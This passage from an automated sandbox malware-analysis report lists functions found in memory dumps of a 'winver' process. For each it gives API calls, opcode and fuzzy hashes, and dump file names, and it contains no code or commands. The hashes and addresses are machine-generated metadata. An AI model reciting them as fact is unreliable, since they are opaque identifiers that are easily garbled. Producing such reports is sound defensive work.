Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 9901438c2586e9e5c9ef03038e2a8c19e1523d5f359449bae7620798132ee483
Instruction ID: 1c3e4fd853adefeeb1757b5b34abe6ce493c3df245cd4e5fda005c8e5922ee88
Opcode Fuzzy Hash: 9901438c2586e9e5c9ef03038e2a8c19e1523d5f359449bae7620798132ee483
Instruction Fuzzy Hash: A6E0EC51F1964B86FF19AFF2A80A1B966B56F58BD0F044134D90DC7352FE3CF4956600

Function 00007FF63D7D0AB8 Relevance: 2.6, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF63D7D0B1B
GetLastError.KERNEL32 ref: 00007FF63D7D0B25

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: b1b7ff2b0a9a597313785845c48143bd4b80d52650074663cd5b17d6975574d9
Instruction ID: 945b4301e15681209e3f8af12142059ae61e536d370eace347954dc1fa0ab5cf
Opcode Fuzzy Hash: b1b7ff2b0a9a597313785845c48143bd4b80d52650074663cd5b17d6975574d9
Instruction Fuzzy Hash: EB11C811F0C68E45FEA457E5A8952BD12E29F84764F082235DA2EC73D2FD7CB864B312

Function 00007FFD9B902539 Relevance: 1.6, APIs: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32 ref: 00007FFD9B902617

Memory Dump Source

Source File: 0000000B.00000002.2953818151.00007FFD9B900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b900000_winver.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: c996b8d2911352cce8557b70f3efb467f0e620011047e871c5cf965b12854e69
Instruction ID: 804c7919bcc35923a87bf92df9f3a64310f38a5cda7a97c4567219f422bb58a5
Opcode Fuzzy Hash: c996b8d2911352cce8557b70f3efb467f0e620011047e871c5cf965b12854e69
Instruction Fuzzy Hash: 48414831D0DB5D8FDB59DFA88859AF9BBE0EF56310F05826FD04DD71A2CA24A805C781

Function 00007FFD9B90257D Relevance: 1.6, APIs: 1, Instructions: 107fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32 ref: 00007FFD9B902617

Memory Dump Source

Source File: 0000000B.00000002.2953818151.00007FFD9B900000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B900000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b900000_winver.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 079d984320b9db7729f3439f2a3992ad48bde36131b34098e1bc7a19937dce18
Instruction ID: a5d21cf549b01479c3b9f019f686168d5686cbb4174570559acbca1756f0d48b
Opcode Fuzzy Hash: 079d984320b9db7729f3439f2a3992ad48bde36131b34098e1bc7a19937dce18
Instruction Fuzzy Hash: FC31E13190CA5C8FDB19DB98C859AF9BBF0FFA5310F04426FD049D3292CB74A8068B81

Function 00007FF63D7C4EE0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7C4E35

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
Instruction ID: abdc688651bfd9480068bbefc287b79454af4c57a0b7deb85450a50c875d3d1b
Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
Instruction Fuzzy Hash: 8321A721E0C28A85FA219FA1940117DA2B0BF44BC4F154035EE4ED7B86FF7DF851A740

Function 00007FF63D7D7304 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7D7334

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b678d68b1b40dd3c0f253e1c1614ef0c0797d771092387463efb4a1b996585f8
Instruction ID: e58484648a50a8820183e3e635693b0bfd7c54a60df3f91b58c933751dff5393
Opcode Fuzzy Hash: b678d68b1b40dd3c0f253e1c1614ef0c0797d771092387463efb4a1b996585f8
Instruction Fuzzy Hash: CB21623261878687EB658F65E4413B976B1AF84B94F284234DE5EC77D5EF2CE8409B00

Function 00007FF63D7D0A14 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4e63df55e880edbf8187c3b472289844987af28823bd60ed64dfba3470477cb
Instruction ID: d2b0a6d19096d0e6aae6a615a785c0939a5d3097cf164d2b92e390e8da63c3b6
Opcode Fuzzy Hash: b4e63df55e880edbf8187c3b472289844987af28823bd60ed64dfba3470477cb
Instruction Fuzzy Hash: 6C114F72E0864A8AEA159F90E4412ADBB71EFC0751F904132E64D463D6EFBCF050DB00

Function 00007FF63D7C4EEC Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7C4F09

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
Instruction ID: 8452100730d1dde17bdbe565ef336d9c4743197f2263e68d0a9b449077ef8fc3
Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
Instruction Fuzzy Hash: 05014F21E0864F49FE14AAF5A45127811709F84768F281730E92EC73D3FE6CF551A311

Function 00007FF63D7C4F70 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7C4F99

Part of subcall function 00007FF63D7C4EEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7C4F09

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
Instruction ID: 7072763fe6184e0dd4f3e27bd9e439a4127799738c4b6d5680aebd26ed1ca8a9
Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
Instruction Fuzzy Hash: 0AF0B421E0C20F4AEA24A7F9A80217D62B09F40794F281530F95FC73C6FE6CF451A211

Function 00007FF63D7ADAA4 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 4da2b57fa2631c97b025b1226baceb15c5213c5360a3da09be54a0ee4b0771ca
Instruction ID: 1e9aef1870506853a095977500a24a7a926cf15cd275b862d2955df8df976408
Opcode Fuzzy Hash: 4da2b57fa2631c97b025b1226baceb15c5213c5360a3da09be54a0ee4b0771ca
Instruction Fuzzy Hash: 55F0DA62A09A0986EF199FF1D46533823B0EB58F0CF184535DA0E8B385EF3CE954A241

Function 00007FF63D7ADCC8 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF63D7ADCF5

Part of subcall function 00007FF63D7C525C: fread_s.LIBCMT ref: 00007FF63D7C526F

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _fread_nolockfread_s
String ID:
API String ID: 3465328306-0
Opcode ID: 97c498739387eeda4a500631f7d5f30284c35546752c6a76614fa2b8f4087bdc
Instruction ID: de149ac0f0238ec7c434b5efdf67bdf8a2744fda180662ef8b9d4f556e7bf93b
Opcode Fuzzy Hash: 97c498739387eeda4a500631f7d5f30284c35546752c6a76614fa2b8f4087bdc
Instruction Fuzzy Hash: 51E0E592A28A4982DB148B63D040BAD9720F7B8FC4F101022EE4E4B750EF7DC545D700

Function 00007FF63D7B522C Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF63D7B525C

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 87d42939e1f29b9ba7e82166151723e97b6d54d72733ad468af39aa37c4c4853
Instruction ID: 8853bfaddd9b65127322e92699c418d22bfeae67a513aa3dcfab9911f68abe70
Opcode Fuzzy Hash: 87d42939e1f29b9ba7e82166151723e97b6d54d72733ad468af39aa37c4c4853
Instruction Fuzzy Hash: 63E0BD90E1E20F46FD6822E226060FC01608F493F0F2C1B34D93EC93C2BD7DB4966614

Function 00007FF63D7AE680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32 ref: 00007FF63D7AE6A4

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 33be393237f7f87b963d6f9045d7bf58996c61ac79a1ea48898644c938bb6959
Instruction ID: 2516538d1282c7bfa44379e3a830f9da2d0fd8764d6f358f996550b318b5fbe3
Opcode Fuzzy Hash: 33be393237f7f87b963d6f9045d7bf58996c61ac79a1ea48898644c938bb6959
Instruction Fuzzy Hash: 58E04862B0874595DB219B65E5453996376FF4C7D4F444031EE8C83756FD6CD5848B00

Function 000001F9F2BB06A2 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000001F9F2BB0734), ref: 000001F9F2BB06CC

Memory Dump Source

Source File: 0000000B.00000002.2947934764.000001F9F2BB0000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F9F2BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f9f2bb0000_winver.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1d340378761dc9b85dc5a0ab89cfc4e4695a715daf10f3f7e1544f7b5de49a2f
Instruction ID: 654d20effe40f03c002a9a684061deac9d49d13ce9f7315cfe43d7cb50783db6
Opcode Fuzzy Hash: 1d340378761dc9b85dc5a0ab89cfc4e4695a715daf10f3f7e1544f7b5de49a2f
Instruction Fuzzy Hash: 0EE0C2340145084FCB00FF60C8D4BA677A0EB58311F080568EC0ACE166CE204180CB21

Function 00007FF63D7CE3A8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF63D7CE3FD

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 90725e77a24919c7b488adba5198a2c9e16f6feb42cfbf2560974ffc0f7a20ae
Instruction ID: dbb665a99139ad931c93bd81ea76b20214cb77b0217122ca82c9f366ee09e3ec
Opcode Fuzzy Hash: 90725e77a24919c7b488adba5198a2c9e16f6feb42cfbf2560974ffc0f7a20ae
Instruction Fuzzy Hash: 3FF06750F2930F89FE545BE298153B512A4AF88B80F089031D80EC73C2FE6CF582A220

Function 00007FF63D7CCB1C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32 ref: 00007FF63D7CCB5A

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 50a2f0d8851f6983b21294397faee535735fdc4a1dd8f303bf0ce8a7a975efdb
Instruction ID: f1773da7d163282ec3568b1d4d2269036d2e9efb1dec614654a545377c038329
Opcode Fuzzy Hash: 50a2f0d8851f6983b21294397faee535735fdc4a1dd8f303bf0ce8a7a975efdb
Instruction Fuzzy Hash: 67F0F840F0D24F49FE685FE198012B561A09F84FA0F084630EC2EC77C2FE6CB460A620

Function 00007FF63D79C71C Relevance: 1.3, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000001,00007FF63D7952D7,?,?,?,00007FF63D79D5EB), ref: 00007FF63D79C745

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 86a0d8d63b3edb3734400d3876ad68d225b3fcc326a3f5fdf4e87d63b9a4a7fe
Instruction ID: b76ccf32712a9fab1c446fa3c6e61be6ab91bb57c10bb77bc16cd8e924bac7d3
Opcode Fuzzy Hash: 86a0d8d63b3edb3734400d3876ad68d225b3fcc326a3f5fdf4e87d63b9a4a7fe
Instruction Fuzzy Hash: 28E0ECB3E24A0986EB544F65E44533C22B0E728B3EF150725E63C892C9EF7CD5A8D780

Function 00007FFD9B6BF385 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2951662536.00007FFD9B6BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b6bd000_winver.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb219bc09a60f5dd3a555de6f8d4ac127d5bec8ac8d0956de1633665219b639
Instruction ID: 746111c7b2e238db300f76be9ddb4f1be94aedba5c27d0c111f90300ff10d6e4
Opcode Fuzzy Hash: 0cb219bc09a60f5dd3a555de6f8d4ac127d5bec8ac8d0956de1633665219b639
Instruction Fuzzy Hash: 3C41D37250EBC44FD7669B2C98959513FF0EF56220B1906EFD098CF1B3D624B846CBA2

Non-executed Functions

Function 00007FF63D842BD4 Relevance: 70.6, APIs: 38, Strings: 2, Instructions: 587windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7926F4: GetWindowLongPtrW.USER32 ref: 00007FF63D792711

GetWindowLongW.USER32 ref: 00007FF63D842CAF
SendMessageW.USER32 ref: 00007FF63D842CDD
SendMessageW.USER32 ref: 00007FF63D842D08
GetKeyState.USER32 ref: 00007FF63D842DBB
GetKeyState.USER32 ref: 00007FF63D842DCF
SendMessageW.USER32 ref: 00007FF63D842DEC
GetKeyState.USER32 ref: 00007FF63D842DFA
SendMessageW.USER32 ref: 00007FF63D842E2A
SendMessageW.USER32 ref: 00007FF63D842EB0
SendMessageW.USER32 ref: 00007FF63D842EDB
GetCursorPos.USER32 ref: 00007FF63D842F7A
ScreenToClient.USER32 ref: 00007FF63D842F88
SendMessageW.USER32 ref: 00007FF63D842FEB
SendMessageW.USER32 ref: 00007FF63D843013
SendMessageW.USER32 ref: 00007FF63D843046
SendMessageW.USER32 ref: 00007FF63D843078
SendMessageW.USER32 ref: 00007FF63D84309A
SendMessageW.USER32 ref: 00007FF63D8430B0
GetCursorPos.USER32 ref: 00007FF63D8430D8
ScreenToClient.USER32 ref: 00007FF63D8430E6
GetParent.USER32 ref: 00007FF63D843105
SendMessageW.USER32 ref: 00007FF63D843168
SendMessageW.USER32 ref: 00007FF63D843192
ClientToScreen.USER32 ref: 00007FF63D8431E5
TrackPopupMenuEx.USER32 ref: 00007FF63D843222
SendMessageW.USER32 ref: 00007FF63D843247
SendMessageW.USER32 ref: 00007FF63D84326E
ClientToScreen.USER32 ref: 00007FF63D8432B3
TrackPopupMenuEx.USER32 ref: 00007FF63D8432F3
GetWindowLongW.USER32 ref: 00007FF63D843384
DefDlgProcW.USER32 ref: 00007FF63D8435AB

Strings

@GUI_DRAGID, xrefs: 00007FF63D843520
F, xrefs: 00007FF63D843274

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
String ID: @GUI_DRAGID$F
API String ID: 1993697042-4164748364
Opcode ID: 26615a4d45219280a439a0b2554d1e4d8b347572970fad6f5a2a96bcb9871466
Instruction ID: f49954565a9f177a5e92b4b16d2c80a5693e4df2381a2bd5721f548de337e126
Opcode Fuzzy Hash: 26615a4d45219280a439a0b2554d1e4d8b347572970fad6f5a2a96bcb9871466
Instruction Fuzzy Hash: 1052A032A18A4A86EB548FA5D4446BE37B5FF84B84F544136DA0E87BA4EF3CF494D700

Function 00007FF63D83CE20 Relevance: 54.8, APIs: 30, Strings: 1, Instructions: 500windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00007FF63D83CEF7
SendMessageW.USER32 ref: 00007FF63D83CF47
IsMenu.USER32 ref: 00007FF63D83CF62
GetMenuItemInfoW.USER32 ref: 00007FF63D83CFA8
SendMessageW.USER32 ref: 00007FF63D83D03B
SendMessageW.USER32 ref: 00007FF63D83D062
SendMessageW.USER32 ref: 00007FF63D83D07B
SendMessageW.USER32 ref: 00007FF63D83D096
SendMessageW.USER32 ref: 00007FF63D83D0BA
SendMessageW.USER32 ref: 00007FF63D83D0E8
SendMessageW.USER32 ref: 00007FF63D83D104
SendMessageW.USER32 ref: 00007FF63D83D128
GetWindowLongW.USER32 ref: 00007FF63D83D163
SendMessageW.USER32 ref: 00007FF63D83D1B0
SendMessageW.USER32 ref: 00007FF63D83D1D4
SendMessageW.USER32 ref: 00007FF63D83D26E
wsprintfW.USER32 ref: 00007FF63D83D2A5
SendMessageW.USER32 ref: 00007FF63D83D2C2
GetWindowTextW.USER32 ref: 00007FF63D83D2F7
SendMessageW.USER32 ref: 00007FF63D83D319
SendMessageW.USER32 ref: 00007FF63D83D342
GetWindowTextW.USER32 ref: 00007FF63D83D36F
GetWindowLongW.USER32 ref: 00007FF63D83D406
SendMessageW.USER32 ref: 00007FF63D83D43A
SendMessageW.USER32 ref: 00007FF63D83D47B
SendMessageW.USER32 ref: 00007FF63D83D4E4
CharNextW.USER32 ref: 00007FF63D83D51F
SendMessageW.USER32 ref: 00007FF63D83D566
SendMessageW.USER32 ref: 00007FF63D83D59D

Strings

%d/%02d/%02d, xrefs: 00007FF63D83D28A

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
